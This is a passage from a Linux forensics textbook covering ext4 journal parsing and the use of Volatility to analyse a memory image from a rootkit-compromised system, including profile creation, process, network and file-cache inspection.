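    if fields["h_magic"] != JBD2_MAGIC:
        raise ValueError("not a jbd2 block")
    fields["s_uuid"] = block[0x30:0x40]
    fields["blocktype_name"] = BLOCK_TYPES.get(fields["h_blocktype"], "unknown")
    return fields


if __name__ == "__main__":
    # synthetic superblock: 4 KiB blocks, 32768 blocks in the journal
    demo = struct.pack(">12I", JBD2_MAGIC, 4, 0, 4096, 32768, 1, 7, 0, 0, 0, 0, 0)
    demo += bytes(range(16))
    sb = parse_journal_superblock(demo)
    print(sb["blocktype_name"], sb["s_blocksize"], sb["s_maxlen"])
```

The same first three fields form the 12-byte header that begins every journal block, so the magic and block type check can be reused when scanning the journal for descriptor and commit blocks.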
The general format for a transaction in the journal is a descriptor block, followed by one or more data or revocation blocks, and a commit block that completes the transaction. The descriptor block starts with a header (which is the same as the first twelve bytes of the journal superblock) and then has an array of journal block tags that describe the transaction. Data blocks are normally identical to blocks to be written to disk. Revocation blocks contain a list of blocks that were journaled in the past but should no longer be journaled in the future. The most common reason for a revocation is if a metadata block is changed to a regular file data block. The commit block indicates the end of a journal transaction.
I will not provide the internal structures for the journal blocks here for a couple of reasons. First, the journal block structures can differ significantly based on the version of journaling and selected options. The journal is an internal structure that was never really meant to be read by humans. Microsoft has released nothing publicly about their NTFS journaling internals. The only reason we can know about the Linux journaling internals is that it is open source.
Second, there are filesystem utilities in Linux, such as fsck, that can properly read the journal and make any required changes. It is likely a better idea to use the built-in utilities than to try and fix a filesystem by hand. If you do want to delve into the journaling internals, there is no better source than the header and C files themselves. The wiki at kernel.org may also be helpful.
SUMMARY
To say that we learned a little about extended filesystems in this chapter would be quite the understatement. We have covered every feature likely to be found on an ext4 filesystem as of this writing in considerable depth. We also learned a couple of new Python and shell scripting techniques along the way. In the next chapter we will discuss the relatively new field of memory forensics.
CHAPTER 8
Memory Analysis
INFORMATION IN THIS CHAPTER:
Creating a Volatility profile
Getting process information
Process maps and dumps
Getting bash histories
Using Volatility check plugins
Getting network information
Getting filesystem information from memory
VOLATILITY
The Volatility framework is an open source tool written in Python which allows you to analyze memory images. We briefly mentioned Volatility way back in Chapter 3 on live response. The first version of Volatility that supported Linux was released in October 2012. Hopefully Linux support in Volatility will continue to evolve.
We will only cover parts of Volatility that apply to Linux systems. We will not delve too deeply into some of the theory behind how Volatility works either. Our focus is on using the tool. If you are running a Debian-based Linux, Volatility might be available in standard repositories, in which case it can be installed using sudo apt-get install volatility volatility-profiles volatility-tools. If you need to install from source, download the latest version source archive from http://volatilityfoundation.org, uncompress it, then install it by typing sudo ./setup.py install from the main Volatility directory.
CREATING A VOLATILITY PROFILE
Volatility makes use of internal operating system structures. The structures can change from one version of an operating system to the next. Volatility ships with a set of profiles from common versions of Windows. The same is not true for Linux, however. Before rushing to judge, stop to think about how many different kernel versions and variants of Linux exist in the world.
The solution for Linux systems is to create your own profile by compiling a specific program; creating a dwarf file; getting a system map file; and zipping everything together. If this sounds complicated and cumbersome, it is. Never fear, however, as I will show you how to create the profile from your mounted subject image using a shell script. This script should be placed in the same directory as the Volatility module.c and Makefile, which can be found in the tools/linux directory inside of the volatility hierarchy. The script follows.

#!/bin/bash
#
# create-profile.sh
#
# Simple script to create a makefile for a Volatility profile.
# Intended to be used with an image file.
# As developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)

usage() {
  echo "Script to create a Volatility profile from a mounted image file"
  echo "Usage: $0 <path to image root>"
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

# guess the kernel version from the last System.map file in /boot
oldir=$(pwd)
cd "${1}/boot"
ver=$(ls System.map* | sed "s/System.map-//" | tr "\n" "|" \
  | sed -nr 's/([a-zA-Z0-9\.\-]+\|)*([a-zA-Z0-9\.\-]+\|)$/\2/p' \
  | sed "s/|/\n/")
cd "${oldir}"
echo "Version: ${ver}"
PWD=$(pwd)
MAKE=$(which make)

# the command lines under each target must begin with a tab
cat <<EOF > Makefile.${ver}
obj-m += module.o
-include version.mk
all: dwarf
dwarf: module.c
	${MAKE} -C ${1}/lib/modules/${ver}/build \
		CONFIG_DEBUG_INFO=y M="${PWD}" modules
	dwarfdump -di module.ko > module.dwarf
	${MAKE} -C ${1}/lib/modules/${ver}/build M="${PWD}" clean
clean:
	${MAKE} -C ${1}/lib/modules/${ver}/build M="${PWD}" clean
	rm -f module.dwarf
EOF

# make the dwarf file
make -f Makefile.${ver}
# copy the System.map file
cp ${1}/boot/System.map-${ver} ./.
# now make the zip
zip Linux${ver}.zip module.dwarf System.map-${ver}
Let’s walk through this script. It begins with the standard she-bang, usage, and command line parameter count check. The current directory is saved on the line oldir=$(pwd), before changing to the subject’s /boot directory. The next part of the script attempts to guess the correct kernel version based on the name of the System.map file. This is complicated by the fact that there may be more than one kernel installed.
For the purposes of this script, we will assume the subject is running the latest kernel version installed. This is another reason you should run uname -a on the subject system before shutting it down. What makes the line determining the kernel version so complicated is the possibility of having more than one System.map file. Let’s break down the ver=… line.
The first command is ls System.map*, which causes all of the System.map files to be output one per line. The next command, sed "s/System.map-//", replaces “System.map-” with nothing, which essentially strips off the prefix and leaves us with a list of kernel versions, one per line. The third command, tr "\n" "|", substitutes (translates) newline characters to vertical pipes, which puts all versions on the same line. The fourth command contains a long regular expression and a substitution command.
If you examine the regular expression, it consists of two pieces. The first part, “([a-zA-Z0-9\.\-]+\|)*”, matches zero or more items, each consisting of letters, periods, numbers, and dashes followed by a vertical pipe. The second part is identical except that the “*” has become a “$”, which anchors it to the end of the line so that it matches only the last item (a version with a vertical pipe appended). As a result, the first part effectively matches all but the last item. The substitution command “/\2/” causes the second match (latest version) to be substituted for the entire string. Finally, one last sed command is run to change the vertical pipe back to a newline.
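If the sed pipeline is hard to follow, the same steps can be reproduced in a few lines of Python (Python 3 here). This is only an illustrative sketch: the function name is made up, and sorted() stands in for the ordering that ls would produce.

```python
import re


def latest_version(system_map_names):
    """Mimic the ver=... pipeline from create-profile.sh."""
    # ls: one name per line, in sorted order
    names = sorted(system_map_names)
    # first sed: strip the System.map- prefix
    versions = [n.replace("System.map-", "", 1) for n in names]
    # tr: join everything on one line, each version followed by a pipe
    joined = "".join(v + "|" for v in versions)
    # second sed: keep only the last version-plus-pipe item
    last = re.sub(r"([a-zA-Z0-9.\-]+\|)*([a-zA-Z0-9.\-]+\|)$", r"\2", joined)
    # third sed: drop the trailing pipe
    return last.replace("|", "")


if __name__ == "__main__":
    print(latest_version(["System.map-3.16.0-30-generic",
                          "System.map-3.13.0-24-generic"]))
```

Note that “latest” here really means last in sort order. A plain text sort does not always agree with numeric version order, which is one more reason to record the output of uname -a from the live system.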
Once the version has been determined, the script changes back to the original directory with the line that reads cd "${oldir}". The version is echoed to the screen. Note that the variable names have been enclosed in curly brackets, as this tends to be safer than using bare variables, i.e. $oldir, as these are sometimes misinterpreted. The current working directory and full path to the make command are then saved in the PWD and MAKE environment variables, respectively.
The line cat <<EOF > Makefile.${ver} is slightly different from our previous use of cat <<EOF. Here we have directed the output of cat to a file instead of the terminal or another program. The lines that follow, through “EOF”, are used to create a makefile. For those not familiar with makefiles, they are used to more efficiently build software by only rebuilding what is necessary. The general format for a makefile is a line that reads <target>: [dependencies] followed by a tab indented list of commands to build the target. The indented lines must use tabs and not spaces in order for the make utility to properly interpret them.
Normally a makefile is used by simply typing make [target]. In order to use this form of make, a file named Makefile must be present in the current directory. The -f option for make allows specification of an alternate makefile. This is precisely what is done in this script. The last lines of the script run make to create a dwarf file, copy the System.map file from the subject system, and then create a zip file that is used by Volatility as a profile. The output from this script is shown in Figure 8.1.
FIGURE 8.1
Using a shell script to create a Volatility profile.
Once the profile is built, copy it to the volatility/plugins/overlays/linux directory. For my laptop, the full path is /usr/local/lib/python2.7/dist-packages/volatility-2.4-py2.7.egg/volatility/plugins/overlays/linux. As shown in Figure 8.2, any valid zip file in this directory becomes a valid Volatility Linux profile. The command vol.py --info runs Volatility and lists all available profiles and other information. If you pipe the results to grep, like so: vol.py --info | grep Linux, it will give you a list of Linux profiles (plus a couple other things) as shown in the figure.
FIGURE 8.2
Volatility Linux profiles. The highlighted lines show profiles automatically loaded based on the zip files in this directory.
GETTING PROCESS INFORMATION
The syntax for running a command in Volatility is vol.py --profile=<profile> -f <image file> <command>, e.g. vol.py --profile=LinuxUbuntu-14_04-3_16_0-30x64 -f ~/cases/pfe1/ram.lime linux_pslist. If you plan on using scripts to look at process information (or anything for that matter) using Volatility, you can store this obnoxiously long command, with profile and path to your RAM image, in a variable.
If you plan on running more than one volatility command on the command line, you might consider using the alias utility to spare yourself the pain of repeatedly typing all of this (and likely fat-fingering it at least a few times). The general syntax for the alias command is alias shortcut="really long command that you don’t want to type". If you put this command in your .bashrc file (located in your home directory) or other startup file, it will be available to you each time you log in. If you want to use the alias without logging out after editing .bashrc, you must source the .bashrc file by typing . ~/.bashrc. The appropriate line that has been added toward the end of the .bashrc file (which is highlighted) and the sourcing of .bashrc are shown in Figure 8.3.
FIGURE 8.3
Creating an alias to more easily run Volatility. The highlighted line near the end of the .bashrc file creates the appropriate alias.
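If you script Volatility from Python rather than the shell, the same idea of storing the long command once applies. The helper below is a hypothetical sketch (Python 3) that only assembles the argument list described above; it assumes vol.py is on your path and does not run anything itself.

```python
import os.path
import shlex


def vol_command(profile, image, plugin, *plugin_args):
    """Build the argument list for one Volatility run."""
    return ["vol.py", "--profile=" + profile,
            "-f", os.path.expanduser(image), plugin] + list(plugin_args)


if __name__ == "__main__":
    cmd = vol_command("LinuxUbuntu-14_04-3_16_0-30x64",
                      "~/cases/pfe1/ram.lime", "linux_pslist")
    # show the command as it could be pasted into a shell
    print(" ".join(shlex.quote(part) for part in cmd))
```

The returned list can be handed directly to subprocess.check_output() when you want to capture the output of a plugin for further processing.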
All of the supported Linux commands begin with “linux_”. Typing vol.py --info | grep linux_ should produce a complete list of available Linux commands. Partial output from running this command is shown in Figure 8.4. As of Volatility 2.4 there are 66 of these commands. It is important to keep in mind that memory analysis is a somewhat new field. As a result, it is not uncommon for some of these Volatility commands to fail.
FIGURE 8.4
Some of the available Volatility Linux commands.
Volatility provides a number of process commands for Linux systems. One of the simplest is linux_pslist, which produces a list of tasks by walking the task list. This command outputs the process name, process ID, user ID, and group ID (along with a couple other fields that you likely don’t need). Partial output from running this command against our PFE subject system is shown in Figure 8.5. The highlighted row shows a shell associated with the Xing Yi Quan rootkit running with root privileges in process 3027.
FIGURE 8.5
Partial output of the Volatility linux_pslist command. The highlighted row shows a rootkit shell running with administrative privileges.
Another command for listing processes is linux_psaux. This command is named after ps -aux, which is a favorite command for people who want to get a listing of all processes complete with command lines. Partial output from this command is shown in Figure 8.6. The highlighted lines show how a root shell was created with sudo -s (process 3034), which caused bash to run as root (process 3035), and then the LiME module was installed (process 3073) in order to dump the RAM.
FIGURE 8.6
Partial output from running the Volatility linux_psaux command against the PFE subject system.
The two process commands presented thus far only show the processes in isolation. To get information on the relationship of processes to each other, the linux_pstree command can be used. This command will show processes with any subprocesses listed underneath and preceded by a period. Nested processes will have multiple periods prepended to their names. Not surprisingly, almost everything is a subprocess of init, which has a process ID of 1 as it is the first thing executed at boot time. Partial output from running this command against the PFE subject system is shown in Figure 8.7. The highlighted portion clearly shows the creation of the root shell by the user with ID 1000, which was then used to dump the RAM with LiME.
FIGURE 8.7
Partial results from running the Volatility linux_pstree command against the PFE subject system. The highlighted output shows the relationships of processes highlighted in Figure 8.6.
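The period-prefixed layout is easy to reproduce from any list of process and parent IDs, which can be handy when you have flat output and want the relationships. The following sketch (Python 3) is not Volatility code; the function name is made up, and the parent shell with PID 2900 and the process names are hypothetical, with only PIDs 3034, 3035, and 3073 taken from the discussion above.

```python
from collections import defaultdict


def format_tree(processes, root_pid=1):
    """processes: iterable of (pid, ppid, name) tuples."""
    children = defaultdict(list)
    names = {}
    for pid, ppid, name in processes:
        names[pid] = name
        children[ppid].append(pid)

    lines = []

    def walk(pid, depth):
        # one period per level of nesting, as in linux_pstree
        lines.append("." * depth + names[pid] + " " + str(pid))
        for child in sorted(children[pid]):
            if child != pid:  # guard against a process listed as its own parent
                walk(child, depth + 1)

    walk(root_pid, 0)
    return lines


if __name__ == "__main__":
    demo = [(1, 0, "init"), (2900, 1, "bash"), (3034, 2900, "sudo"),
            (3035, 3034, "bash"), (3073, 3035, "insmod")]
    print("\n".join(format_tree(demo)))
```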
While the linux_psaux command is nice and provides a lot of information, there is another command that can provide even more information. That command is linux_psenv. This command lists the full process environment for every displayed process. Because this command will generate a lot of output, you may wish to use the -p option, which allows you to provide a comma delimited set of process identity numbers. For help on this, or any other Volatility command, run vol.py <command> -h for a brief help screen. The last part of this help screen for linux_psenv as well as the results of running linux_psenv on the process associated with the rootkit are shown in Figure 8.8.
FIGURE 8.8
Partial results of running vol.py linux_psenv -h and results of running this command on the process associated with a rootkit.
The -p option from the help screen is highlighted in Figure 8.8. Looking at the bottom of the figure we see that this process was executed by the john user with user ID 1000, and that sudo was used. This does not necessarily mean that John was involved in the compromise. Rather, this tells us that his account was used. There are a number of reasons that his account may have been used. He might have been targeted by someone that knew he had administrative privileges. It is also quite possible that he has a weak password that the attacker was able to crack.
Volatility provides a cross-reference command for processes called linux_psxview. Why would you want such a command? Some malware will attempt to hide its processes from view by altering internal kernel structures. By comparing (cross-referencing) the various structures, inconsistencies related to malware are more easily identified. Partial results of running this command against the PFE subject system are shown in Figure 8.9. In this case nothing unusual was noted.
FIGURE 8.9
Partial results from running linux_psxview against the PFE subject system.
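The cross-referencing idea itself is simple set arithmetic. The sketch below (Python 3) is not how Volatility implements it; the function name, source names, and PIDs are invented for illustration. It takes the set of PIDs seen by each source and reports any PID that at least one source fails to list.

```python
def cross_reference(views):
    """views: dict mapping a source name to the set of PIDs it reports.

    Returns a dict of PID -> sorted list of sources that do NOT list it.
    """
    all_pids = set().union(*views.values())
    report = {}
    for pid in sorted(all_pids):
        missing = sorted(name for name, pids in views.items() if pid not in pids)
        if missing:
            report[pid] = missing
    return report


if __name__ == "__main__":
    # hypothetical data: a process unlinked from the task list only
    demo = {
        "task_list": {1, 2900, 3035},
        "pid_hash": {1, 2900, 3027, 3035},
        "kmem_cache": {1, 2900, 3027, 3035},
    }
    print(cross_reference(demo))
```

An empty result corresponds to the “nothing unusual” outcome seen on the PFE subject system. Short-lived processes can also cause mismatches, so a hit is a lead to follow rather than proof of a rootkit.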
PROCESS MAPS AND DUMPS
In the previous section we saw how Volatility can be used to get lists of processes including detailed information on each process. In this section we will examine how to use Volatility to determine how processes are laid out (mapped) in memory. The first command we will discuss is linux_proc_maps. The results of running this command against the rootkit process on the PFE subject system are shown in Figure 8.10.
FIGURE 8.10
Getting a process map for the rootkit process.
The linux_proc_maps command displays memory segments used by a process. Notice that each segment has flags (permissions) associated with it. What you will not see on Linux (in theory at least) is a segment that is both writable and executable, as this would open the door for an attacker to rewrite code in a process and then run malicious code. Notice that if a file is associated with a chunk of memory, its inode and file path are also displayed. In other words, the filesystem analysis performed in previous chapters is still applicable when analyzing memory.
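Checking permissions by eye gets tedious for processes with many segments. Here is a short sketch (Python 3) that flags segments that are both writable and executable. It assumes text laid out like /proc/<pid>/maps on a live system, with the permission string in the second column; the column layout of linux_proc_maps output differs, so the index would need adjusting. The function name and sample lines are made up.

```python
def writable_and_executable(maps_text):
    """Return the lines whose permission field contains both w and x."""
    flagged = []
    for line in maps_text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        perms = parts[1]  # e.g. r-xp, rw-p
        if "w" in perms and "x" in perms:
            flagged.append(line.strip())
    return flagged


if __name__ == "__main__":
    sample = """\
00400000-0040c000 r-xp 00000000 08:01 1234 /tmp/demo
0060b000-0060c000 rw-p 0000b000 08:01 1234 /tmp/demo
7f0000000000-7f0000001000 rwxp 00000000 00:00 0
"""
    for hit in writable_and_executable(sample):
        print(hit)
```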
The rootkit appears to be loaded at the standard place of 0x400000. It has a couple of additional segments, one of which is read only. There is also a heap associated with this program. A couple of shared libraries, which also have some extra memory segments (for storing their variables), are loaded higher up in memory. The program stack (which grows downward) is also in the higher memory locations. There is an alternative command to get this information, linux_proc_maps_rb. This command uses the balanced tree structures used to map memory as the source of its data. These trees are also known as red-black trees, which is the reason for the _rb suffix.
The fact that the C library is loaded suggests that this rootkit was written in C or C++. This can’t be proven without analyzing the code, however, as it is possible to load this library even if the rootkit was written in another language such as Assembly. How can the rootkit be examined? The Volatility linux_procdump command can be used to dump a process’s memory to a file. We will discuss what to do with such a file later in this book when we discuss malware analysis.
The linux_procdump command accepts an optional process ID list and requires an output directory, which is specified with the -D (or --directory=) option. Figure 8.11 shows the results from running linux_procdump on our rootkit process and printing out the first part of the resulting dump. We can see from the first four bytes in the dump that this is an Executable and Linkable Format (ELF) file that has been loaded into memory.
FIGURE 8.11
Results of running the Volatility linux_procdump command on the rootkit from the PFE subject system. The first four bytes of the dump indicate this is an executable in ELF format.
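The four-byte check is simple to automate when you have dumped many processes. The sketch below (Python 3) tests for the ELF magic number, 0x7F followed by the letters ELF, and also reads the fifth byte, which records whether the file is 32-bit or 64-bit. The function names are hypothetical.

```python
ELF_MAGIC = b"\x7fELF"
ELF_CLASSES = {1: "32-bit", 2: "64-bit"}  # values of the EI_CLASS byte


def looks_like_elf(header):
    """True if the given bytes begin with the ELF magic number."""
    return header[:4] == ELF_MAGIC


def elf_class(header):
    """Return '32-bit', '64-bit', or None if this is not a usable ELF header."""
    if not looks_like_elf(header) or len(header) < 5:
        return None
    return ELF_CLASSES.get(header[4])


def is_elf_file(path):
    """Check the first four bytes of a file on disk."""
    with open(path, "rb") as f:
        return looks_like_elf(f.read(4))


if __name__ == "__main__":
    print(elf_class(b"\x7fELF\x02\x01\x01"))
```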
GETTING BASH HISTORIES
Earlier in this book we discussed how to get users’ bash histories from their history files. We can also get the bash history information from the bash process memory itself. As discussed previously, a sophisticated attacker might delete the history files and/or set the history size to zero. The history size is determined by the HISTSIZE environment variable, which is normally set in the .bashrc file (default value is 1000). Even if the history is not being saved to disk, it is still present in memory.
The Volatility command for retrieving bash histories from bash process memory is linux_bash. Partial results from running this command against the PFE subject system, with suspicious activity highlighted, are shown in Figure 8.12 and Figure 8.13. Many other actions by the attacker were found that are not displayed in the figures.
FIGURE 8.12
Partial results from running linux_bash against the PFE subject system. The highlighted portion shows where an attacker attempted to modify the /etc/passwd file after moving the bogus johnn user’s home directory.
FIGURE 8.13
Partial results from running linux_bash against the PFE subject system. The highlighted portion shows where an attacker moved a home directory for a newly created user and set passwords for system accounts.
Just as we have a command for retrieving the environment for any process, linux_psenv, there is a Volatility command that returns the environment for any running bash shell. This command is called linux_bash_env. Partial results from running this command are shown in Figure 8.14. From the USER variable in each of the bash shells shown in the figure, we can see that one shell is run by the john user and the other is run by root. It is likely that the john user started the second shell with sudo -s.
FIGURE 8.14
Partial output from running the Volatility linux_bash_env command against the PFE subject system.
When a command is run for the first time in a bash shell, bash must search through the user’s path (stored in the PATH environment variable). Because this is a time consuming process, bash stores frequently run commands in a hash table to alleviate the need to find programs each time. This hash table can be viewed, modified, and even cleared using the hash command. Volatility provides the command linux_bash_hash for viewing this bash hash table for each bash shell in memory. The results of running this command against the PFE subject system are shown in Figure 8.15.
FIGURE 8.15
Results from running the Volatility linux_bash_hash command against the PFE subject system.
VOLATILITY CHECK COMMANDS
Volatility contains several commands that perform checks for various forms of malware. Many of these commands are of the form linux_check_xxxx. In general, Volatility commands can take a long time to run, and these check commands seem to take the longest time. How long is a long time? Figure 8.16 shows a screenshot from an attempt to run the linux_apihooks command, which is used to detect userland API hooks, against the PFE subject system. After three hours of processing the small (2 GB) RAM image on my i7 laptop with 8 GB of memory, the command still hadn’t completed.
FIGURE 8.16
A very long running Volatility command. The command was aborted after it had not completed in nearly three hours.
If you suspect that the function pointers for network protocols on a system have been modified, the linux_check_afinfo command will check these function pointers for tampering. This command returned no results when run against the PFE subject system. The linux_check_creds command is used to detect processes that are sharing credentials. Those familiar with Windows may have heard of pass-the-hash or pass-the-token attacks, in which an attacker borrows credentials from one process to run another process with elevated privileges. This command checks for the Linux equivalent of this attack. Running this command against the PFE subject system also produced no results.
The linux_check_fop command can be used to check file operation structures that may have been altered by a rootkit. Once again, running this command against the PFE subject system produced no results. This is not surprising. The rootkit installed on this system hides itself with a method that doesn’t involve altering the file operation commands (rather, the directory information is modified).
Many readers are likely familiar with interrupts. These are functions that are called based on hardware and software events. The function that is called when a particular interrupt fires is determined by entries in the Interrupt Descriptor Table (IDT). The Volatility command linux_check_idt allows the IDT to be displayed. The results of running this command against the PFE subject system are shown in Figure 8.17. Notice how all of the addresses are close to each other. A significantly different address in any of these slots would be suspicious.
FIGURE 8.17
Results from running the Volatility linux_check_idt command against the PFE subject system.
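The “addresses are close to each other” test can be turned into a rough script once you have the handler addresses in hand. The sketch below (Python 3) flags any entry that is far from the median address. The function name, the 16 MB threshold, and the sample addresses are all arbitrary choices made for illustration, not values taken from Volatility or from Figure 8.17.

```python
from statistics import median_low


def suspicious_entries(handlers, max_distance=0x1000000):
    """handlers: dict mapping an IDT index to its handler address.

    Returns the entries whose address is more than max_distance
    bytes away from the median handler address.
    """
    if not handlers:
        return {}
    center = median_low(handlers.values())  # stays an exact integer
    return {index: addr for index, addr in handlers.items()
            if abs(addr - center) > max_distance}


if __name__ == "__main__":
    # hypothetical table: three handlers in kernel text, one elsewhere
    demo = {
        0: 0xffffffff8172c000,
        1: 0xffffffff8172c100,
        2: 0xffffffff8172c200,
        3: 0xffffffffa0123000,
    }
    for index, addr in suspicious_entries(demo).items():
        print(index, hex(addr))
```

Using the median rather than the average keeps one or two hooked entries from dragging the reference point toward themselves.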
The kernel mode counterpart to the linux_apihooks command is linux_check_inline_kernel. This command checks for inline kernel hooks. In other words, this verifies that kernel function calls aren’t being redirected to somewhere else. Running this command against the PFE subject system produced no results.
Volatility provides the linux_check_modules function, which will compare the module list (stored in /proc/modules) against the modules found in /sys/module. Rootkits might be able to hide by altering the lsmod command or other internal structures, but they always must exist somewhere in a kernel structure. This command also produced no results when run against the PFE subject system.
While Windows uses an API, Linux computers utilize system calls for most operating system functions. Like interrupts, system calls are stored in a table and are referenced by number. The mapping of numbers to functions is stored in system headers. The linux_check_syscall command will check the system call table for alterations. If something has been changed, “HOOKED” is displayed after the index and the address. Otherwise, the normal function name is displayed. On 64-bit systems there are two system call tables. One table is for 64-bit calls and the other for 32-bit calls. Running this command against the PFE subject system revealed that the 64-bit open, lstat, dup, kill, getdents, chdir, rename, rmdir, and unlinkat system calls had all been hooked by the Xing Yi Quan rootkit.
Volatility provides two commands for detecting keylogging: linux_check_tty and linux_keyboard_notifiers. Each of these checks for well-documented keylogging techniques. The first checks for interception at the terminal device level, and the second verifies that all processes on the keyboard notifier list are in the kernel address space (user address space indicates malware). If a problem is detected, the word “HOOKED” is displayed. The results of running these two commands are shown in Figure 8.18. No keylogger was detected on the PFE subject system.
FIGURE 8.18
Running Volatility keylogging detection commands against the PFE subject system.
GETTING NETWORKING INFORMATION
Many types of malware will attempt to exfiltrate data and/or use some form of interprocess communication (IPC). These activities usually involve some sort of networking. Volatility allows you to get various types of networking information in order to help you locate malware.
The Linux ifconfig command is used to list network interfaces along with their MAC and IP addresses, etc. The Volatility linux_ifconfig command will provide a list of network interfaces with IP address, MAC address, and whether or not promiscuous mode is enabled. As a reminder, packets received on an interface that are for a different interface are normally dropped. An interface in promiscuous mode may be used for packet sniffing as no packets are dropped. The results of running this command against the PFE subject system are shown in Figure 8.19. Nothing unusual is seen here.
FIGURE 8.19
Results of running the Volatility linux_ifconfig command against the PFE subject system.
Once the network interfaces are known, you should look at open ports on the subject machine. On Linux systems the netstat command is one of many tools that will report this type of information. The Volatility linux_netstat command provides similar information. Readers are likely familiar with TCP and UDP sockets. Some may not be familiar with UNIX sockets, which are also reported by netstat. A UNIX socket is used for interprocess communication on the same machine. If you look at a typical Linux system it will have a lot of these sockets in use. Don't overlook these sockets in your investigation, as they could be used for IPC between malware components or as a way to interact with legitimate system processes.
Because the linux_netstat command returns so much information, you might want to combine it with grep to separate the various socket types. Results from running the linux_netstat command with the results piped to grep TCP are shown in Figure 8.20. The highlighted line shows a rootkit shell is listening on port 7777. We can also see Secure Shell (SSH) and File Transfer Protocol (FTP) servers running on this machine. There are dangers associated with running an FTP server. One of these is the fact that logins are unencrypted, which allows for credentials to be easily intercepted. Online password cracking against the FTP server is also much quicker than running a password cracker against SSH. This FTP server could have easily been the source of this breach.
FIGURE 8.20
TCP sockets on the PFE subject system.
The results from running linux_netstat against the PFE subject system and piping them to grep UDP are shown in Figure 8.21. Partial results of running this command and piping output to grep UNIX are shown in Figure 8.22. Not surprisingly, a large number of UNIX sockets are being used by operating system and X-Windows components. Nothing out of the ordinary is seen here.
FIGURE 8.21
UDP sockets on the PFE subject system.
FIGURE 8.22
Partial listing of UNIX sockets on the PFE subject system.
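If the linux_netstat output has been saved to a file, the three grep passes can be done in one step. The Python sketch below is only an illustration. It assumes each line of output begins with the socket type (TCP, UDP, or UNIX), and the sample lines are hypothetical rather than copied from the figures. Unlike grep, which matches the word anywhere on the line, this version only looks at the first field.

```python
from collections import defaultdict


def split_by_socket_type(netstat_text, types=("TCP", "UDP", "UNIX")):
    """Group saved netstat-style lines by the socket type in the first field."""
    groups = defaultdict(list)
    for line in netstat_text.splitlines():
        fields = line.split()
        if fields and fields[0] in types:
            groups[fields[0]].append(line)
    return dict(groups)


# Hypothetical lines in the general shape of netstat-style output.
saved_output = """\
TCP 0.0.0.0 : 7777 0.0.0.0 : 0 LISTEN example_shell/1234
TCP 0.0.0.0 : 22 0.0.0.0 : 0 LISTEN sshd/900
UDP 0.0.0.0 : 68 0.0.0.0 : 0 dhclient/700
UNIX 9000 init/1
"""

for socket_type, lines in split_by_socket_type(saved_output).items():
    print(socket_type, len(lines))
```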
Linux provides an extensive system, known as netfilter, for filtering out various networking packets. Netfilter allows a set of hooks to be created at various points in the network flow, such as pre-routing, post-routing, etc. A complete discussion of netfilter is well beyond the scope of this book. The Volatility linux_netfilter command will list netfilter hooks that are present. Running this command against the PFE subject system revealed a pre-routing hook with an address similar to that of the system call hooks created by the Xing Yi Quan rootkit.
The Address Resolution Protocol (ARP) is used to translate IP addresses to MAC (hardware) addresses. Some attacks work by altering the ARP table and/or by abusing ARP protocols. Volatility provides the linux_arp command for printing ARP tables. The results of running this command against the PFE subject system are shown in Figure 8.23. There appears to be nothing amiss here.
FIGURE 8.23
The ARP Table from the PFE subject system.
Sockets operating in promiscuous mode can be listed with the Volatility linux_list_raw command. Running this command against the PFE subject system only showed the two Dynamic Host Configuration Protocol (DHCP) clients. There are two because each network interface using DHCP has its own process. In other words, this revealed nothing abnormal.
GETTING FILESYSTEM INFORMATION
The previous, quite lengthy, chapter dealt with filesystems. You might wonder why you would use a memory analysis tool to inspect filesystems. There are a couple of reasons for doing this. First of all, knowing what filesystems have been mounted can be helpful. Secondly, many modern Linux systems make use of temporary filesystems that go away when the system is shut down. A tool like Volatility may be the only way to recover these temporary filesystems.
The Volatility linux_mount command lists all mounted filesystems complete with mount options. The results from this command allow you to detect extra things that have been mounted, and also filesystems that have been remounted by an attacker with new options. Partial results from running this command against the PFE subject system are shown in Figure 8.24. The FAT (/dev/sdb1) and ext4 (/dev/sdb2) partitions from my response drive used to load LiME can be seen in the figure.
FIGURE 8.24
Partial results from running the Volatility linux_mount command against the PFE subject system.
Not surprisingly, Linux caches recently accessed files. The Volatility linux_enumerate_files command allows you to get a list of the files in the cache. This can help you more easily locate interesting files when performing your filesystem analysis. As can be seen from Figure 8.25, the john user has a lot of files associated with the rootkit in his Downloads folder. This command produces a lot of output. To home in on particular directories, you might want to pipe the results to egrep '^<path of interest>', e.g. egrep '^/tmp/'. The “^” in the regular expression anchors the search pattern to the start of the line, which should eliminate the problem of other directories and files that contain the search string appearing in your results. The anchor works with plain grep as well as egrep (extended grep); egrep is used here. Partial results from piping the command output to egrep '^/tmp/' are shown in Figure 8.26. Notice there are several files associated with the rootkit here, including #657112, #657110, and #657075, which are inode numbers associated with the rootkit files.
FIGURE 8.25
Rootkit files in the filesystem cache.
FIGURE 8.26
Partial results of running the Volatility linux_enumerate_files command against the PFE subject system and piping the output to egrep '^/tmp/'.
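The effect of the “^” anchor is easy to demonstrate. The Python sketch below is an illustration only. It assumes each line of the saved listing begins with the file path, as the egrep example implies, and the function name and sample paths other than /tmp/xingyi_bindshell_port are hypothetical.

```python
import re


def files_under(listing_lines, directory):
    """Keep only lines whose path starts with the given directory."""
    prefix = directory.rstrip("/") + "/"
    pattern = re.compile("^" + re.escape(prefix))  # anchored like egrep '^/tmp/'
    return [line for line in listing_lines if pattern.search(line)]


listing = [
    "/tmp/xingyi_bindshell_port",
    "/home/john/tmp/notes.txt",   # contains /tmp/ but not at the start
    "/var/tmp/cache.dat",
]

print(files_under(listing, "/tmp"))
```

Without the anchor, the second and third paths would also match, which is exactly the noise the anchored pattern is meant to remove.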
Once files in the cache have been discovered using linux_enumerate_files, the Volatility linux_find_file command can be used to print out the inode information. This command can also be used to extract the file. To get the inode information the -F <full path to file> option must be used. Unfortunately, the -F option doesn't appear to support wildcards. Once the inode number and address are found, linux_find_file can be rerun with the -i <address of inode> -O <output file> options. The full process of recovering the /tmp/xingyi_bindshell_port file is shown in Figure 8.27. From the figure we can see that this file stores the value 7777, which corresponds to our earlier discovery in the networking section of this chapter.
FIGURE 8.27
Recovering a file with Volatility.
MISCELLANEOUS VOLATILITY COMMANDS
As we said at the beginning of this chapter, we have not covered every one of the Volatility commands for Linux systems. There are a couple of reasons for this. First, the available commands are not equally useful. Some might only be occasionally helpful. Second, I have found that later kernels are not well-supported by Volatility. Some of the commands will fail spectacularly, while others will produce an unsupported error message and exit gracefully. For completeness, I have listed additional Linux commands in Table 8.1.
Table 8.1 Additional Volatility commands not discussed in this chapter.
Command | Description | Notes
